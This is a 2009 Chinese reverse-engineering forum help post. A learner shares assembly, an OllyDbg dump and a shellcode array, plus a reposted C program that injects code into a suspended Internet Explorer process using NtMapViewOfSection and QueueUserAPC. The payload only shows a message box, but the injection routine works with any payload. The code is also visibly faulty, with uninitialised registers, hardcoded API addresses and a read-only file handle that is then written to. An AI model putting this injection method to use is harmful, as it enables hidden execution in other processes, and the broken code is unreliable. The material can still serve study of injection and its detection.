[旧帖] [求助]一个利用alertable I/o 和 mapping来完成远程注入,shellcode是不是这样写 0.00雪花
发表于: 2009-2-19 21:08 2807
看到一篇利用alertable I/O 和 mapping来完成远程注入的文章,自己动手弄了弄,搞不定阿,才学汇编一个月不到,望牛牛们指点一二阿
我按照QueueUserAPC 第一个参数要求的函数形式写成了一个子程序
(很简单只是调出一个messagebox):
.386                                    ; 32-bit x86 target
.model flat,stdcall                     ; flat model; stdcall is the default convention for 'proc'
option casemap:none                     ; identifiers are case-sensitive
include windows.inc                     ; Win32 types/constants (NULL is used below)
include kernel32.inc                    ; prototypes for GetModuleHandle / GetProcAddress
include user32.inc                      ; no user32 import is referenced directly; MessageBoxA is resolved at run time
includelib kernel32.lib
includelib user32.lib
.code
start:                                  ; entry point named in 'end start'; marks the address of the Queue proc that follows
;-----------------------------------------------------------------------
; Queue - the routine the author intends to run as a user APC.
; Declared stdcall with three dword parameters (hence 'retn 0Ch' in the
; OD dump that follows). Builds "MessageBoxA",0 and "user32.dll",0 on
; the stack one byte at a time, resolves MessageBoxA through
; GetModuleHandle / GetProcAddress and calls it with four NULLs.
; The byte-at-a-time stores and the absence of any data section are what
; let the routine be copied out as a flat byte string; any change to the
; instruction sequence changes the dumped bytes and the shellcode[] array.
; In:     _lParam1.._lParam3 (unused)
; Saves:  ebx, edi, esi (via the 'uses' clause)
; Locals: @szFuncName[32], @szDll[32], @hModule, @MessageBox
;-----------------------------------------------------------------------
Queue proc uses ebx edi esi _lParam1,_lParam2,_lParam3
local @szFuncName[32]:byte              ; receives "MessageBoxA",0
local @szDll[32]:byte                   ; intended to hold "user32.dll",0
local @hModule                          ; HMODULE returned by GetModuleHandle
local @MessageBox                       ; address returned by GetProcAddress
lea esi,@szFuncName                     ; esi = &@szFuncName
mov al,'M'                              ; "MessageBoxA": one byte per stosb
stosb                                   ; stosb: byte ptr es:[edi] = al; edi += 1
mov al,'e'
stosb
mov al,'s'
stosb
mov al,'s'
stosb
mov al,'a'
stosb
mov al,'g'
stosb
mov al,'e'
stosb
mov al,'B'
stosb
mov al,'o'
stosb
mov al,'x'
stosb
mov al,'A'
stosb
mov al,0                                ; terminator of "MessageBoxA"
stosb
mov al,'u'                              ; "user32.dll" continues in the same stosb stream
stosb
mov al,'s'
stosb
mov al,'e'
stosb
mov al,'r'
stosb
mov al,'3'
stosb
mov al,'2'
stosb
mov al,'.'
stosb
mov al,'d'
stosb
mov al,'l'
stosb
mov al,'l'
stosb
mov al,0                                ; terminator of "user32.dll"
stosb
lea eax,@szDll
push eax                                ; lpModuleName = @szDll
call GetModuleHandle                    ; import thunk here; replaced by an absolute address in the OD dump
mov @hModule,eax
lea eax,@szFuncName
push eax                                ; lpProcName = @szFuncName
push @hModule                           ; hModule
call GetProcAddress                     ; likewise replaced by an absolute address in the OD dump
mov @MessageBox,eax                     ; resolved entry point; not checked for NULL
push NULL                               ; uType
push NULL                               ; lpCaption
push NULL                               ; lpText
push NULL                               ; hWnd
call @MessageBox                        ; MessageBoxA(NULL, NULL, NULL, NULL)
ret                                     ; epilogue restores esi/edi/ebx, frees locals, retn 0Ch
Queue endp
end start
并用OD将GetModuleHandle、GetProcAddress的调用换成它们的入口地址(假设每个程序中user32.dll、kernel32.dll有相同的地址,俄!),拷出此子程序的十六进制代码
00401000 >/$ 55 push ebp
00401001 |. 8BEC mov ebp, esp
00401003 |. 83C4 B8 add esp, -48
00401006 |. 53 push ebx
00401007 |. 57 push edi
00401008 |. 56 push esi
00401009 |. 8D75 E0 lea esi, dword ptr [ebp-20]
0040100C |. B0 4D mov al, 4D
0040100E |. AA stos byte ptr es:[edi]
0040100F |. B0 65 mov al, 65
00401011 |. AA stos byte ptr es:[edi]
00401012 |. B0 73 mov al, 73
00401014 |. AA stos byte ptr es:[edi]
00401015 |. B0 73 mov al, 73
00401017 |. AA stos byte ptr es:[edi]
00401018 |. B0 61 mov al, 61
0040101A |. AA stos byte ptr es:[edi]
0040101B |. B0 67 mov al, 67
0040101D |. AA stos byte ptr es:[edi]
0040101E |. B0 65 mov al, 65
00401020 |. AA stos byte ptr es:[edi]
00401021 |. B0 42 mov al, 42
00401023 |. AA stos byte ptr es:[edi]
00401024 |. B0 6F mov al, 6F
00401026 |. AA stos byte ptr es:[edi]
00401027 |. B0 78 mov al, 78
00401029 |. AA stos byte ptr es:[edi]
0040102A |. B0 41 mov al, 41
0040102C |. AA stos byte ptr es:[edi]
0040102D |. B0 00 mov al, 0
0040102F |. AA stos byte ptr es:[edi]
00401030 |. B0 75 mov al, 75
00401032 |. AA stos byte ptr es:[edi]
00401033 |. B0 73 mov al, 73
00401035 |. AA stos byte ptr es:[edi]
00401036 |. B0 65 mov al, 65
00401038 |. AA stos byte ptr es:[edi]
00401039 |. B0 72 mov al, 72
0040103B |. AA stos byte ptr es:[edi]
0040103C |. B0 33 mov al, 33
0040103E |. AA stos byte ptr es:[edi]
0040103F |. B0 32 mov al, 32
00401041 |. AA stos byte ptr es:[edi]
00401042 |. B0 2E mov al, 2E
00401044 |. AA stos byte ptr es:[edi]
00401045 |. B0 64 mov al, 64
00401047 |. AA stos byte ptr es:[edi]
00401048 |. B0 6C mov al, 6C
0040104A |. AA stos byte ptr es:[edi]
0040104B |. B0 6C mov al, 6C
0040104D |. AA stos byte ptr es:[edi]
0040104E |. B0 00 mov al, 0
00401050 |. AA stos byte ptr es:[edi]
00401051 |. 8D45 C0 lea eax, dword ptr [ebp-40]
00401054 |. 50 push eax ; /pModule
00401055 E8 D7A6407C call 7c80b731
0040105A |. 8945 BC mov dword ptr [ebp-44], eax
0040105D |. 8D45 E0 lea eax, dword ptr [ebp-20]
00401060 |. 50 push eax ; /ProcNameOrOrdinal
00401061 |. FF75 BC push dword ptr [ebp-44] ; |hModule
00401064 E8 C79D407C call 7c80ae30
00401069 |. 8945 B8 mov dword ptr [ebp-48], eax
0040106C |. 6A 00 push 0
0040106E |. 6A 00 push 0
00401070 |. 6A 00 push 0
00401072 |. 6A 00 push 0
00401074 |. FF55 B8 call dword ptr [ebp-48]
00401077 |. 5E pop esi
00401078 |. 5F pop edi
00401079 |. 5B pop ebx
0040107A |. C9 leave
0040107B \. C2 0C00 retn 0C
十六进制的代码:
/* Raw bytes of the Queue routine, copied from the OD listing above
   (55 8B EC = push ebp / mov ebp,esp ... C2 0C 00 = retn 0Ch). The two
   E8 call encodings embed the kernel32 entry addresses 7c80b731 and
   7c80ae30 that were patched in with OD, so the array is tied to that
   one kernel32 build and load address. Referenced by sizeof() and by
   WriteFile in WinMain. */
byte shellcode[]={0x55,0x8B,0xEC,0x83,0xC4,0xB8,0x53,0x57,0x56,0x8D,0x75,
0xE0,0xB0,0x4D,0xAA,0xB0,0x65,0xAA,0xB0,0x73,0xAA,
0xB0,0x73,0xAA,0xB0,0x61,0xAA,0xB0,0x67,0xAA,0xB0,
0x65,0xAA,0xB0,0x42,0xAA,0xB0,0x6F,0xAA,0xB0,0x78,
0xAA,0xB0,0x41,0xAA,0xB0,0x00,0xAA,0xB0,0x75,0xAA,
0xB0,0x73,0xAA,0xB0,0x65,0xAA,0xB0,0x72,0xAA,0xB0,
0x33,0xAA,0xB0,0x32,0xAA,0xB0,0x2E,0xAA,0xB0,0x64,
0xAA,0xB0,0x6C,0xAA,0xB0,0x6C,0xAA,0xB0,0x00,0xAA,
0x8D,0x45,0xC0,0x50,0xE8,0xD7,0xA6,0x40,0x7C,0x89,
0x45,0xBC,0x8D,0x45,0xE0,0x50,0xFF,0x75,0xBC,0xE8,
0xC7,0x9D,0x40,0x7C,0x89,0x45,0xB8,0x6A,0x00,0x6A,
0x00,0x6A,0x00,0x6A,0x00,0xFF,0x55,0xB8,0x5E,0x5F,
0x5B,0xC9,0xC2,0x0C,0x00};
用WriteFile函数写入shellcode.txt,是不是这样就可以远程运行那个小子程序了????
试了不行,哈哈,太笨了,肯定哪里功夫不到家,望牛牛指点指点拉~~
[转]我研究出了一种新的在远程进程中执行代码的可能性,就是利用一个未文档函数在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求。让源码说明一切:(我为我的英文水平感到抱歉,我来自德国)
代码:
#define _WIN32_WINNT 0x0400                          /* older SDK headers guard QueueUserAPC behind this level */
#include <windows.h>
typedef LONG NTSTATUS, *PNTSTATUS;                   /* native status type; not provided by windows.h */
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) /* non-negative NTSTATUS = success or informational */
typedef enum _SECTION_INHERIT                        /* InheritDisposition argument of NtMapViewOfSection */
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;
/* Prototype for the undocumented ntdll export NtMapViewOfSection.
   The 7th parameter is a SIZE_T pointer; the wrapper below passes the
   address of a ULONG, which has the same width on 32-bit only. */
typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );
func_NtMapViewOfSection NtMapViewOfSection = NULL;   /* filled in at run time by WinMain via GetProcAddress */
/*
 * MyMapViewOfFileEx - MapViewOfFileEx with an explicit target process.
 *
 * Thin wrapper over ntdll!NtMapViewOfSection (the global function pointer
 * must already be resolved). Unlike the Win32 MapViewOfFileEx, hProcess
 * selects the process whose address space receives the view, so the
 * section's pages appear in another process without VirtualAllocEx or
 * WriteProcessMemory ever being called. From a monitoring standpoint this
 * is the event to correlate with the QueueUserAPC that WinMain issues next.
 *
 * hProcess             target process (WinMain passes the handle from CreateProcess)
 * hFileMappingObject   section handle from CreateFileMapping
 * dwDesiredAccess      FILE_MAP_WRITE / FILE_MAP_READ / FILE_MAP_COPY, mapped to
 *                      PAGE_READWRITE / PAGE_READONLY / PAGE_WRITECOPY; anything
 *                      else becomes PAGE_NOACCESS. No execute protection is ever
 *                      requested here.
 * dwFileOffsetHigh/Low 64-bit section offset
 * dwNumberOfBytesToMap passed through as the in/out ViewSize (0 in WinMain)
 * lpBaseAddress        preferred base, NULL lets the kernel choose
 * returns              base of the view inside hProcess, or NULL on failure;
 *                      the NTSTATUS is discarded and no last-error is set.
 */
LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )
{
NTSTATUS Status;
LARGE_INTEGER SectionOffset;
ULONG ViewSize;                         /* passed where the prototype expects a SIZE_T pointer; 32-bit only */
ULONG Protect;
LPVOID ViewBase;
// Assemble the 64-bit section offset
SectionOffset.LowPart = dwFileOffsetLow;
SectionOffset.HighPart = dwFileOffsetHigh;
// Preferred base and size; both are in/out parameters of NtMapViewOfSection
ViewBase = lpBaseAddress;
ViewSize = dwNumberOfBytesToMap;
// Translate the FILE_MAP_* access flags into an NT page protection
if (dwDesiredAccess & FILE_MAP_WRITE)
{
Protect = PAGE_READWRITE;
}
else if (dwDesiredAccess & FILE_MAP_READ)
{
Protect = PAGE_READONLY;
}
else if (dwDesiredAccess & FILE_MAP_COPY)
{
Protect = PAGE_WRITECOPY;
}
else
{
Protect = PAGE_NOACCESS;
}
// Map the section into hProcess (not necessarily the calling process)
Status = NtMapViewOfSection(hFileMappingObject,   /* SectionHandle */
hProcess,                               /* ProcessHandle */
&ViewBase,                              /* BaseAddress, in/out */
0,                                      /* ZeroBits */
0,                                      /* CommitSize */
&SectionOffset,                         /* SectionOffset */
&ViewSize,                              /* ViewSize, in/out */
ViewShare,                              /* InheritDisposition */
0,                                      /* AllocationType */
Protect);                               /* Win32Protect */
if (!NT_SUCCESS(Status))
{
// Failure: status is dropped, caller only sees NULL
return NULL;
}
// Success: base address of the new view in hProcess
return ViewBase;
}
/*
 * WinMain - driver for the section-mapping + APC technique described in
 * the post. The sequence, each step of which is observable host telemetry:
 *   1. resolve ntdll!NtMapViewOfSection at run time;
 *   2. open C:\shellcode.txt, WriteFile the shellcode[] bytes to it and
 *      create a PAGE_READONLY file mapping over the file;
 *   3. CreateProcess iexplore.exe with CREATE_SUSPENDED;
 *   4. map the section into the new process via MyMapViewOfFileEx;
 *   5. QueueUserAPC the mapped base onto the suspended primary thread and
 *      ResumeThread.
 * No return value of any API call is checked, and the ntdll handle from
 * LoadLibrary is never released.
 */
int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
DWORD dwNum;
HMODULE hDll = LoadLibrary( "ntdll.dll" );                                  /* ntdll is already mapped in every process; this only yields a handle */
NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");   /* undocumented export; not NULL-checked */
// Payload: the shellcode[] array declared above, staged through a file on disk
HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile (hFile,shellcode,sizeof (shellcode),&dwNum,NULL);
HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);   /* read-only section over the whole file */
// Start the target suspended so none of its own code has run yet
STARTUPINFO st;
ZeroMemory (&st, sizeof(st));
st.cb = sizeof (STARTUPINFO);
PROCESS_INFORMATION pi;
ZeroMemory (&pi, sizeof(pi));
CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);   /* German-locale "Program Files" path */
// Place the section in the target's address space (cross-process map; no WriteProcessMemory involved)
LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);
// Queue an APC at the mapped base; the author's intent is that it runs first when the target thread resumes
QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);   /* MappedFile is not checked for NULL */
ResumeThread (pi.hThread);
CloseHandle (hFile);
CloseHandle (hMappedFile);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
return 0;
}